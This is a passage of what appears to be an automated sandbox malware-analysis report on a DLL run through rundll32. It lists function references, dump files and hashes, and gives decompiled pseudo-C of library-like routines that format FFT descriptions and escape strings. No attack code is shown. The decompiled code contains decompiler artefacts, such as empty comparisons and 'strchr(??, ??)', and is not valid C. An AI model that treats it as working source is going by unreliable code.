                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015594
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100155DB
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100155E7
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100155F6
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015602
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015667
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015673
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100156BA
                                                      • mv_expr_free.MAIN ref: 10017A0C
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001542C
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015438
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015447
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015453
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001549A
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100154A6
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100154B5
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100154C1
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015517
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015523
                                                      • mv_expr_free.MAIN ref: 100179FD
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100152FA
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015306
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001534D
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015359
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015368
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015374
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100153D9
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100153E5
                                                      • mv_expr_free.MAIN ref: 10017B63
                                                      • mv_expr_free.MAIN ref: 10017B72
                                                      • mv_expr_free.MAIN ref: 10017B81
                                                      • mv_freep.MAIN ref: 10017B90
                                                      • mv_freep.MAIN ref: 10017B98
                                                      • mv_freep.MAIN ref: 10017BA7
                                                      • mv_freep.MAIN ref: 10017BB3
                                                      • mv_freep.MAIN ref: 10017BC2
                                                      • mv_freep.MAIN ref: 10017BCE
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_freep$mv_expr_free$mv_expr_parsemv_mallocstrlen
                                                      • String ID:
                                                      • API String ID: 1389959791-0
                                                      • Opcode ID: 8ed2cf0b96ea738395e10688aaa6a7ba80d46e84586e5b5581eb5791b7552261
                                                      • Instruction ID: 676c052f7482def6436772c87c2f32b108e761ae451283d38321aee012e0f911
                                                      • Opcode Fuzzy Hash: 8ed2cf0b96ea738395e10688aaa6a7ba80d46e84586e5b5581eb5791b7552261
                                                      • Instruction Fuzzy Hash: 1BD173B9A187418FC750EF68D48191ABBF0FF89214F45496DE9D48B315E736E8848F82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      [Control-flow graph of function 1004E110; graph image not reproduced. Calls shown in the graph: mv_bprint_init, mv_bprintf, mv_log, and subfunction 1004DA90.]
                                                      C-Code - Quality: 37%
                                                      			E1004E110(intOrPtr* __eax, void* __ecx, char* __edx) {
                                                      				char _v1052;
                                                      				char* _v1056;
                                                      				intOrPtr _v1072;
                                                      				char* _v1076;
                                                      				char* _v1080;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				char* _t52;
                                                      				signed int _t57;
                                                      				char* _t59;
                                                      				char* _t64;
                                                      				intOrPtr* _t92;
                                                      				char* _t102;
                                                      				char* _t104;
                                                      				void* _t108;
                                                      				signed int _t109;
                                                      				void* _t111;
                                                      				char* _t112;
                                                      				void* _t113;
                                                      				intOrPtr* _t114;
                                                      
                                                      				_t111 = __ecx;
                                                      				_t92 = __eax;
                                                      				_t114 = _t113 - 0x42c;
                                                      				_t52 = 0;
                                                      				_v1056 = __edx;
                                                      				do {
                                                      					 *((intOrPtr*)(_t114 + _t52 + 0x20)) = 0;
                                                      					 *((intOrPtr*)(_t114 + _t52 + 0x24)) = 0;
                                                      					_t52 = _t52 + 8;
                                                      				} while (_t52 < 0x400);
                                                      				_v1076 = 1;
                                                      				_t112 =  &_v1052;
                                                      				_v1080 = 0;
                                                      				 *_t114 = _t112;
                                                      				E10008880(__eax, _t108, __ecx, _t112);
                                                      				_v1080 = "%s - type: ";
                                                      				 *_t114 = _t112;
                                                      				_v1076 =  *_t92;
                                                      				L100089C0();
                                                      				_t57 =  *(_t92 + 8);
                                                      				if(_t57 > 8) {
                                                      					_t59 =  !=  ? "unknown" : "any";
                                                      				} else {
                                                      					switch( *((intOrPtr*)(_t57 * 4 +  &M100BCC2C))) {
                                                      						case 0:
                                                      							__eax = "fft_float";
                                                      							goto L5;
                                                      						case 1:
                                                      							_t59 = "mdct_float";
                                                      							goto L5;
                                                      						case 2:
                                                      							__eax = "fft_double";
                                                      							goto L5;
                                                      						case 3:
                                                      							__eax = "mdct_double";
                                                      							goto L5;
                                                      						case 4:
                                                      							__eax = "fft_int32";
                                                      							goto L5;
                                                      						case 5:
                                                      							__eax = "mdct_int32";
                                                      							goto L5;
                                                      						case 6:
                                                      							__eax = "rdft_float";
                                                      							goto L5;
                                                      						case 7:
                                                      							__eax = "rdft_double";
                                                      							goto L5;
                                                      						case 8:
                                                      							__eax = "rdft_int32";
                                                      							goto L5;
                                                      					}
                                                      				}
                                                      				L5:
                                                      				_v1076 = _t59;
                                                      				_v1080 = "%s";
                                                      				 *_t114 = _t112;
                                                      				L100089C0();
                                                      				_v1080 = ", len: ";
                                                      				 *_t114 = _t112;
                                                      				L100089C0();
                                                      				_t102 =  *((intOrPtr*)(_t92 + 0x28));
                                                      				_t64 =  *((intOrPtr*)(_t92 + 0x2c));
                                                      				if(_t102 != _t64) {
                                                      					_v1076 = _t102;
                                                      					_v1080 = "[%i, ";
                                                      					 *_t114 = _t112;
                                                      					L100089C0();
                                                      					_t64 =  *((intOrPtr*)(_t92 + 0x2c));
                                                      				}
                                                      				if(_t64 == 0xffffffff) {
                                                      					 *_t114 = _t112;
                                                      					_v1080 = 0x100bcc00;
                                                      					L100089C0();
                                                      				} else {
                                                      					_v1076 = _t64;
                                                      					_v1080 = 0x100bcc04;
                                                      					 *_t114 = _t112;
                                                      					L100089C0();
                                                      				}
                                                      				_v1080 = "%s, factors: [";
                                                      				 *_t114 = _t112;
                                                      				_t69 =  !=  ? 0x100bcb72 : 0x100bcb03;
                                                      				_t109 = 0;
                                                      				_v1076 =  !=  ? 0x100bcb72 : 0x100bcb03;
                                                      				L100089C0();
                                                      				_t104 =  *((intOrPtr*)(_t92 + 0x18));
                                                      				if(_t104 == 0xffffffff) {
                                                      					 *_t114 = _t112;
                                                      					_t109 = 1;
                                                      					_v1080 = "any";
                                                      					L100089C0();
                                                      					goto L13;
                                                      				} else {
                                                      					L10:
                                                      					if(_t104 != 0) {
                                                      						_v1076 = _t104;
                                                      						_v1080 = 0x100bcc04;
                                                      						 *_t114 = _t112;
                                                      						L100089C0();
                                                      						L12:
                                                      						_t109 = _t109 + 1;
                                                      						if(_t109 != 4) {
                                                      							L13:
                                                      							if( *((intOrPtr*)(_t92 + 0x18 + _t109 * 4)) != 0) {
                                                      								 *_t114 = _t112;
                                                      								_v1080 = 0x100bcb00;
                                                      								L100089C0();
                                                      								_t104 =  *((intOrPtr*)(_t92 + 0x18 + _t109 * 4));
                                                      								if(_t104 != 0xffffffff) {
                                                      									goto L10;
                                                      								} else {
                                                      									 *_t114 = _t112;
                                                      									_v1080 = "any";
                                                      									L100089C0();
                                                      									goto L12;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				 *_t114 = _t112;
                                                      				_v1080 = "], ";
                                                      				L100089C0();
                                                      				L1004DA90(_t112,  *((intOrPtr*)(_t92 + 0x14)),  *((intOrPtr*)(_t92 + 0x10)));
                                                      				if(_t111 != 0) {
                                                      					 *_t114 = _t112;
                                                      					_v1080 = ", prio: %i";
                                                      					_v1076 = _v1056;
                                                      					L100089C0();
                                                      				}
                                                      				 *_t114 = 0;
                                                      				_v1080 = 0x28;
                                                      				_v1072 = _v1052;
                                                      				_v1076 = "%s\n";
                                                      				return L10023A40();
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprint_init, mv_bprintf
                                                      • String ID: %s$%s - type: $%s, factors: [$, len: $, prio: %i$[%i, $], $any$fft_double$fft_float$fft_int32$mdct_double$mdct_float$mdct_int32$rdft_double$rdft_float$rdft_int32$unknown
                                                      • API String ID: 3566169034-155954179
                                                      • Opcode ID: 88f9e843cdda70b065da0d6e9f33fb5096cf4e39f39d2173ac39fcec4dc56677
                                                      • Instruction ID: a933a466284158a9cdbf5e2fa88c9023184ecaf356d014cc5bc8696811956cc8
                                                      • Opcode Fuzzy Hash: 88f9e843cdda70b065da0d6e9f33fb5096cf4e39f39d2173ac39fcec4dc56677
                                                      • Instruction Fuzzy Hash: 5051F7B8A08784CBD740EF29858191EBBE1FB84350F65892EE8C9CB355DB38DC409B46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      [Figure: control-flow graph of function 10009730; legend: Executed / Not Executed]
                                                      C-Code - Quality: 18%
                                                      			E10009730(int _a4, int _a8, unsigned int _a12, void** _a16, void* _a20) {
                                                      				char _v29;
                                                      				signed int _v32;
                                                      				int _v36;
                                                      				char _v37;
                                                      				void** _v40;
                                                      				signed int _v44;
                                                      				char** _v52;
                                                      				int _v56;
                                                      				int __ebx;
                                                      				int __edi;
                                                      				signed int __esi;
                                                      				int __ebp;
                                                      				signed int _t114;
                                                      				void** _t115;
                                                      				int _t116;
                                                      				int _t117;
                                                      				void* _t118;
                                                      				void* _t119;
                                                      				int _t120;
                                                      				void* _t121;
                                                      				signed char _t123;
                                                      				void* _t124;
                                                      				signed char* _t129;
                                                      				int _t130;
                                                      				void* _t133;
                                                      				unsigned int _t135;
                                                      				int _t136;
                                                      				signed int _t137;
                                                      				char _t146;
                                                      				void* _t150;
                                                      				int _t157;
                                                      				signed int _t158;
                                                      				void* _t163;
                                                      				void* _t164;
                                                      				void* _t167;
                                                      				void** _t170;
                                                      				int _t172;
                                                      				int _t173;
                                                      				int _t174;
                                                      				void* _t175;
                                                      				void** _t178;
                                                      				void*** _t179;
                                                      				void** _t180;
                                                      
                                                      				_t179 =  &_v44;
                                                      				_t170 = _a4;
                                                      				_t129 = _a8;
                                                      				_v44 = _a12;
                                                      				_t112 = _a16;
                                                      				if(_a16 == 2) {
                                                      					L1();
                                                      					_t114 =  *_t129 & 0x000000ff;
                                                      					__eflags = _t114;
                                                      					if(_t114 != 0) {
                                                      						while(1) {
                                                      							L56:
                                                      							__eflags = _t114 - 0x27;
                                                      							if(_t114 == 0x27) {
                                                      								break;
                                                      							}
                                                      							_t129 =  &(_t129[1]);
                                                      							L1();
                                                      							_t114 =  *_t129 & 0x000000ff;
                                                      							__eflags = _t114;
                                                      							if(_t114 != 0) {
                                                      								continue;
                                                      							}
                                                      							goto L58;
                                                      						}
                                                      						 *_t179 = _t170;
                                                      						_t129 =  &(_t129[1]);
                                                      						_v56 = 0x100ac503;
                                                      						L100089C0();
                                                      						_t114 =  *_t129 & 0x000000ff;
                                                      						__eflags = _t114;
                                                      						if(_t114 != 0) {
                                                      							goto L56;
                                                      						} else {
                                                      						}
                                                      					}
                                                      					L58:
                                                      					_t179 =  &(_t179[0xb]);
                                                      					_t112 = _t170;
                                                      					_pop(_t129);
                                                      					_pop(_t170);
                                                      					_pop(_t161);
                                                      					_pop(_t177);
                                                      					_t178 = _t112;
                                                      					_push(_t170);
                                                      					_push(_t129);
                                                      					_t115 =  &(_t112[4]);
                                                      					_t180 = _t179 - 0x2c;
                                                      					_v29 = 0x27;
                                                      					_t130 =  *(_t115 - 8);
                                                      					_v40 = _t115;
                                                      					while(1) {
                                                      						_t116 = _a4;
                                                      						_t144 =  <=  ? _t116 : _t130;
                                                      						_t172 = _t130 - ( <=  ? _t116 : _t130);
                                                      						if(_t172 > 1) {
                                                      							break;
                                                      						}
                                                      						_t135 = _a12;
                                                      						if(_t116 >= _t130 || _t135 == _t130) {
                                                      							L22:
                                                      							__eflags = _t172;
                                                      							if(_t172 != 0) {
                                                      								_t172 = 1;
                                                      								break;
                                                      							}
                                                      						} else {
                                                      							_t154 =  >  ? 1 : 0xfffffffe - _t116;
                                                      							_t17 = _t116 + 1; // 0xffffffff
                                                      							_t121 = ( >  ? 1 : 0xfffffffe - _t116) + _t17;
                                                      							if(_t135 >> 1 >= _t130) {
                                                      								_t130 = _t130 + _t130;
                                                      								__eflags = _t130;
                                                      							} else {
                                                      								_t130 = _t135;
                                                      							}
                                                      							if(_t130 < _t121) {
                                                      								_t125 =  <=  ? _t135 : _t121;
                                                      								_t130 =  <=  ? _t135 : _t121;
                                                      							}
                                                      							_t163 =  *_t178;
                                                      							_v56 = _t130;
                                                      							if(_t163 == _v40) {
                                                      								 *_t180 = 0;
                                                      								_t123 = E10026280();
                                                      								__eflags = _t123;
                                                      								if(_t123 == 0) {
                                                      									goto L21;
                                                      								} else {
                                                      									goto L15;
                                                      								}
                                                      							} else {
                                                      								 *_t180 = _t163;
                                                      								_t123 = E10026280();
                                                      								if(_t123 == 0) {
                                                      									L21:
                                                      									_t116 = _a4;
                                                      									goto L22;
                                                      								} else {
                                                      									if(_t163 == 0) {
                                                      										L15:
                                                      										_t157 = _a4;
                                                      										_t164 = _t123;
                                                      										_t175 =  *_t178;
                                                      										_t136 = _t157 + 1;
                                                      										_v36 = _t175;
                                                      										__eflags = _t136 - 8;
                                                      										if(_t136 >= 8) {
                                                      											__eflags = _t123 & 0x00000001;
                                                      											if((_t123 & 0x00000001) != 0) {
                                                      												_t137 =  *_t175 & 0x000000ff;
                                                      												_t35 = _t123 + 1; // 0x1
                                                      												_t164 = _t35;
                                                      												_t175 = _t175 + 1;
                                                      												 *_t123 = _t137;
                                                      												_t136 = _t157;
                                                      											}
                                                      											__eflags = _t164 & 0x00000002;
                                                      											if((_t164 & 0x00000002) != 0) {
                                                      												_t158 =  *_t175 & 0x0000ffff;
                                                      												_t164 = _t164 + 2;
                                                      												_t175 = _t175 + 2;
                                                      												_t136 = _t136 - 2;
                                                      												 *(_t164 - 2) = _t158;
                                                      											}
                                                      											__eflags = _t164 & 0x00000004;
                                                      											if((_t164 & 0x00000004) == 0) {
                                                      												goto L16;
                                                      											} else {
                                                      												_t167 = _t164 + 4;
                                                      												 *(_t167 - 4) =  *_t175;
                                                      												_t124 = memcpy(_t167, _t175 + 4, _t136 - 4);
                                                      												_t180 =  &(_t180[3]);
                                                      												goto L8;
                                                      											}
                                                      										} else {
                                                      											L16:
                                                      											_t124 = memcpy(_t164, _t175, _t136);
                                                      											_t180 =  &(_t180[3]);
                                                      											goto L8;
                                                      										}
                                                      										goto L23;
                                                      									}
                                                      									L8:
                                                      									 *_t178 = _t124;
                                                      									_a8 = _t130;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						L23:
                                                      						__eflags = 0xfffffffa;
                                                      						_t149 =  >  ? 1 : 0xfffffffa - _t116;
                                                      						_t150 = ( >  ? 1 : 0xfffffffa - _t116) + _t116;
                                                      						_t117 = _a8;
                                                      						_a4 = 0xfffffffa;
                                                      						__eflags = _t117;
                                                      						if(_t117 != 0) {
                                                      							_t118 = _t117 - 1;
                                                      							__eflags = _t118 - 0xfffffffa;
                                                      							_t119 =  >  ? _t150 : _t118;
                                                      							 *((char*)( *_t178 + _t119)) = 0;
                                                      							return _t119;
                                                      						}
                                                      						return _t117;
                                                      						goto L122;
                                                      					}
                                                      					_t173 = _t172 - 1;
                                                      					__eflags = _t173;
                                                      					_t174 =  >  ? 1 : _t173;
                                                      					_t146 = _v29;
                                                      					_t133 =  *_t178 + _t116;
                                                      					__eflags = _t174;
                                                      					if(_t174 != 0) {
                                                      						_t120 = 0;
                                                      						__eflags = 0;
                                                      						do {
                                                      							 *((char*)(_t133 + _t120)) = _t146;
                                                      							_t120 = _t120 + 1;
                                                      							__eflags = _t120 - _t174;
                                                      						} while (_t120 < _t174);
                                                      						_t116 = _a4;
                                                      					}
                                                      					goto L23;
                                                      				} else {
                                                      					__eflags = __eax - 3;
                                                      					if(__eax != 3) {
                                                      						__eax =  *__ebx;
                                                      						__eflags = __al;
                                                      						if(__al != 0) {
                                                      							__eflags = __cl & 0x00000002;
                                                      							if((__cl & 0x00000002) == 0) {
                                                      								_v37 = 1;
                                                      								__ebp = _v44;
                                                      								__edi = __ebx;
                                                      								__eflags = _v44;
                                                      								if(_v44 == 0) {
                                                      									_v36 = __ecx;
                                                      									while(1) {
                                                      										 *__esp = " \n\t\r";
                                                      										__ebp = __al;
                                                      										_v56 = __ebp;
                                                      										__eax = strchr(??, ??);
                                                      										_v56 = __ebp;
                                                      										 *__esp = "\'\\";
                                                      										_v44 = __eax;
                                                      										__eax = strchr(??, ??);
                                                      										__eflags = __eax;
                                                      										if(__eax == 0) {
                                                      											goto L118;
                                                      										}
                                                      										L113:
                                                      										__edx = 0x5c;
                                                      										__eax = __esi;
                                                      										L1();
                                                      										L114:
                                                      										__edx =  *__edi;
                                                      										__eax = __esi;
                                                      										__edi = __edi + 1;
                                                      										L1();
                                                      										__eax =  *__edi & 0x000000ff;
                                                      										__eflags = __al;
                                                      										if(__al != 0) {
                                                      											__eflags = __ebx - __edi;
                                                      											if(__ebx == __edi) {
                                                      												_v37 = 1;
                                                      											} else {
                                                      												__eflags =  *(__edi + 1);
                                                      												_v37 =  *(__edi + 1) == 0;
                                                      											}
                                                      											continue;
                                                      										}
                                                      										goto L53;
                                                      										L118:
                                                      										__edx = _v44;
                                                      										__eflags = _v44;
                                                      										if(_v44 != 0) {
                                                      											__eflags = _v36 & 0x00000001;
                                                      											if((_v36 & 0x00000001) != 0) {
                                                      												goto L113;
                                                      											} else {
                                                      												__eflags = _v37;
                                                      												if(_v37 != 0) {
                                                      													goto L113;
                                                      												} else {
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L114;
                                                      									}
                                                      								} else {
                                                      									_v32 = __ecx;
                                                      									while(1) {
                                                      										 *__esp = " \n\t\r";
                                                      										__ebp = __al;
                                                      										_v56 = __ebp;
                                                      										__eax = strchr(??, ??);
                                                      										_v56 = __ebp;
                                                      										_v36 = __eax;
                                                      										__eax = _v44;
                                                      										 *__esp = _v44;
                                                      										__eax = strchr(??, ??);
                                                      										__eflags = __eax;
                                                      										if(__eax == 0) {
                                                      											goto L97;
                                                      										}
                                                      										L70:
                                                      										__edx = 0x5c;
                                                      										__eax = __esi;
                                                      										L1();
                                                      										L71:
                                                      										__edx =  *__edi;
                                                      										__eax = __esi;
                                                      										__edi = __edi + 1;
                                                      										L1();
                                                      										__eax =  *__edi & 0x000000ff;
                                                      										__eflags = __al;
                                                      										if(__al != 0) {
                                                      											__eflags = __ebx - __edi;
                                                      											if(__ebx == __edi) {
                                                      												_v37 = 1;
                                                      											} else {
                                                      												__eflags =  *(__edi + 1);
                                                      												_v37 =  *(__edi + 1) == 0;
                                                      											}
                                                      											continue;
                                                      										}
                                                      										goto L53;
                                                      										L97:
                                                      										__eax = strchr("\'\\", __ebp);
                                                      										__eflags = __eax;
                                                      										if(__eax != 0) {
                                                      											goto L70;
                                                      										} else {
                                                      											__eax = _v36;
                                                      											__eflags = _v36;
                                                      											if(_v36 != 0) {
                                                      												__eflags = _v32 & 0x00000001;
                                                      												if((_v32 & 0x00000001) != 0) {
                                                      													goto L70;
                                                      												} else {
                                                      													__eflags = _v37;
                                                      													if(_v37 != 0) {
                                                      														goto L70;
                                                      													} else {
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L71;
                                                      									}
                                                      								}
                                                      							} else {
                                                      								__edx = _v44;
                                                      								__eflags = _v44;
                                                      								if(_v44 == 0) {
                                                      									while(1) {
                                                      										__edx =  *__ebx;
                                                      										__eax = __esi;
                                                      										__ebx = __ebx + 1;
                                                      										L1();
                                                      										__eflags =  *__ebx;
                                                      										if( *__ebx == 0) {
                                                      											goto L53;
                                                      										}
                                                      										__edx =  *__ebx;
                                                      										__eax = __esi;
                                                      										__ebx = __ebx + 1;
                                                      										L1();
                                                      										__eflags =  *__ebx;
                                                      										if( *__ebx == 0) {
                                                      											return __eax;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									do {
                                                      										_v56 = __eax;
                                                      										__eax = _v44;
                                                      										 *__esp = _v44;
                                                      										__eax = strchr(??, ??);
                                                      										__eflags = __eax;
                                                      										if(__eax != 0) {
                                                      											__edx = 0x5c;
                                                      											__eax = __esi;
                                                      											L1();
                                                      										}
                                                      										__edx =  *__ebx;
                                                      										__eax = __esi;
                                                      										__ebx = __ebx + 1;
                                                      										L1();
                                                      										__eax =  *__ebx;
                                                      										__eflags = __al;
                                                      									} while (__al != 0);
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						__eax =  *__ebx & 0x000000ff;
                                                      						__eflags = __al;
                                                      						if(__al != 0) {
                                                      							__edx = __ecx;
                                                      							__edx = __ecx & 0x00000008;
                                                      							__eflags = __cl & 0x00000004;
                                                      							if((__cl & 0x00000004) != 0) {
                                                      								__eflags = __edx;
                                                      								if(__edx == 0) {
                                                      									goto L85;
                                                      								} else {
                                                      									do {
                                                      										__dl = __al;
                                                      										__dl = __al - 0x22;
                                                      										__eflags = __dl - 0x1c;
                                                      										if(__dl > 0x1c) {
                                                      											L89:
                                                      											__edx = __al;
                                                      											__eax = __esi;
                                                      											L1();
                                                      											goto L90;
                                                      										}
                                                      										__edx = __dl & 0x000000ff;
                                                      										switch( *((intOrPtr*)((__dl & 0x000000ff) * 4 +  &M100AC530))) {
                                                      											case 0:
                                                      												 *__esp = __esi;
                                                      												__eax = "&quot;";
                                                      												_v52 = "&quot;";
                                                      												__eax = 0x100ac500;
                                                      												_v56 = 0x100ac500;
                                                      												__eax = L100089C0();
                                                      												goto L90;
                                                      											case 1:
                                                      												goto L89;
                                                      											case 2:
                                                      												 *__esp = __esi;
                                                      												__eax = 0x100ac508;
                                                      												_v52 = 0x100ac508;
                                                      												__eax = 0x100ac500;
                                                      												_v56 = 0x100ac500;
                                                      												__eax = L100089C0();
                                                      												goto L90;
                                                      											case 3:
                                                      												 *__esp = __esi;
                                                      												__eax = "&apos;";
                                                      												_v52 = "&apos;";
                                                      												__eax = 0x100ac500;
                                                      												_v56 = 0x100ac500;
                                                      												__eax = L100089C0();
                                                      												goto L90;
                                                      											case 4:
                                                      												 *__esp = __esi;
                                                      												__edi = 0x100ac50e;
                                                      												__ebp = 0x100ac500;
                                                      												_v52 = 0x100ac50e;
                                                      												_v56 = 0x100ac500;
                                                      												__eax = L100089C0();
                                                      												goto L90;
                                                      											case 5:
                                                      												 *__esp = __esi;
                                                      												__edx = 0x100ac513;
                                                      												__ecx = 0x100ac500;
                                                      												_v52 = 0x100ac513;
                                                      												_v56 = 0x100ac500;
                                                      												__eax = L100089C0();
                                                      												goto L90;
                                                      										}
                                                      										L90:
                                                      										__eax =  *(__ebx + 1) & 0x000000ff;
                                                      										__ebx = __ebx + 1;
                                                      										__eflags = __al;
                                                      									} while (__al != 0);
                                                      									return __eax;
                                                      								}
                                                      								do {
                                                      									goto L85;
                                                      									L84:
                                                      									__eax =  *(__ebx + 1) & 0x000000ff;
                                                      									__ebx = __ebx + 1;
                                                      									__eflags = __al;
                                                      								} while (__al != 0);
                                                      								goto L53;
                                                      								L85:
                                                      								__eflags = __al - 0x3c;
                                                      								if(__eflags == 0) {
                                                      									 *__esp = __esi;
                                                      									__eax = 0x100ac50e;
                                                      									__edx = 0x100ac500;
                                                      									_v52 = 0x100ac50e;
                                                      									_v56 = 0x100ac500;
                                                      									__eax = L100089C0();
                                                      								} else {
                                                      									if(__eflags <= 0) {
                                                      										__eflags = __al - 0x26;
                                                      										if(__al == 0x26) {
                                                      											 *__esp = __esi;
                                                      											__eax = 0x100ac508;
                                                      											_v52 = 0x100ac508;
                                                      											__eax = 0x100ac500;
                                                      											_v56 = 0x100ac500;
                                                      											__eax = L100089C0();
                                                      										} else {
                                                      											__eflags = __al - 0x27;
                                                      											if(__al != 0x27) {
                                                      												goto L103;
                                                      											} else {
                                                      												 *__esp = __esi;
                                                      												__ebp = "&apos;";
                                                      												__eax = 0x100ac500;
                                                      												_v52 = "&apos;";
                                                      												_v56 = 0x100ac500;
                                                      												__eax = L100089C0();
                                                      											}
                                                      										}
                                                      									} else {
                                                      										__eflags = __al - 0x3e;
                                                      										if(__al != 0x3e) {
                                                      											L103:
                                                      											__edx = __al;
                                                      											__eax = __esi;
                                                      											L1();
                                                      										} else {
                                                      											 *__esp = __esi;
                                                      											__ecx = 0x100ac513;
                                                      											__edi = 0x100ac500;
                                                      											_v52 = 0x100ac513;
                                                      											_v56 = 0x100ac500;
                                                      											__eax = L100089C0();
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L84;
                                                      							} else {
                                                      								__eflags = __edx;
                                                      								if(__edx == 0) {
                                                      									do {
                                                      										__eflags = __al - 0x3c;
                                                      										if(__al == 0x3c) {
                                                      											 *__esp = __esi;
                                                      											__ebp = 0x100ac50e;
                                                      											__eax = 0x100ac500;
                                                      											_v52 = 0x100ac50e;
                                                      											_v56 = 0x100ac500;
                                                      											__eax = L100089C0();
                                                      										} else {
                                                      											__eflags = __al - 0x3e;
                                                      											if(__al != 0x3e) {
                                                      												__eflags = __al - 0x26;
                                                      												if(__al == 0x26) {
                                                      													 *__esp = __esi;
                                                      													__eax = 0x100ac508;
                                                      													_v52 = 0x100ac508;
                                                      													__eax = 0x100ac500;
                                                      													_v56 = 0x100ac500;
                                                      													__eax = L100089C0();
                                                      												} else {
                                                      													__edx = __al;
                                                      													__eax = __esi;
                                                      													L1();
                                                      												}
                                                      											} else {
                                                      												 *__esp = __esi;
                                                      												__ecx = 0x100ac513;
                                                      												__edi = 0x100ac500;
                                                      												_v52 = 0x100ac513;
                                                      												_v56 = 0x100ac500;
                                                      												__eax = L100089C0();
                                                      											}
                                                      										}
                                                      										__eax =  *(__ebx + 1) & 0x000000ff;
                                                      										__ebx = __ebx + 1;
                                                      										__eflags = __al;
                                                      									} while (__al != 0);
                                                      								} else {
                                                      									do {
                                                      										__eflags = __al - 0x3c;
                                                      										if(__eflags == 0) {
                                                      											 *__esp = __esi;
                                                      											__edx = 0x100ac50e;
                                                      											__ecx = 0x100ac500;
                                                      											_v52 = 0x100ac50e;
                                                      											_v56 = 0x100ac500;
                                                      											__eax = L100089C0();
                                                      										} else {
                                                      											if(__eflags <= 0) {
                                                      												__eflags = __al - 0x22;
                                                      												if(__al == 0x22) {
                                                      													 *__esp = __esi;
                                                      													__eax = "&quot;";
                                                      													_v52 = "&quot;";
                                                      													__eax = 0x100ac500;
                                                      													_v56 = 0x100ac500;
                                                      													__eax = L100089C0();
                                                      												} else {
                                                      													__eflags = __al - 0x26;
                                                      													if(__al != 0x26) {
                                                      														goto L102;
                                                      													} else {
                                                      														 *__esp = __esi;
                                                      														__eax = 0x100ac508;
                                                      														_v52 = 0x100ac508;
                                                      														__eax = 0x100ac500;
                                                      														_v56 = 0x100ac500;
                                                      														__eax = L100089C0();
                                                      													}
                                                      												}
                                                      											} else {
                                                      												__eflags = __al - 0x3e;
                                                      												if(__al != 0x3e) {
                                                      													L102:
                                                      													__edx = __al;
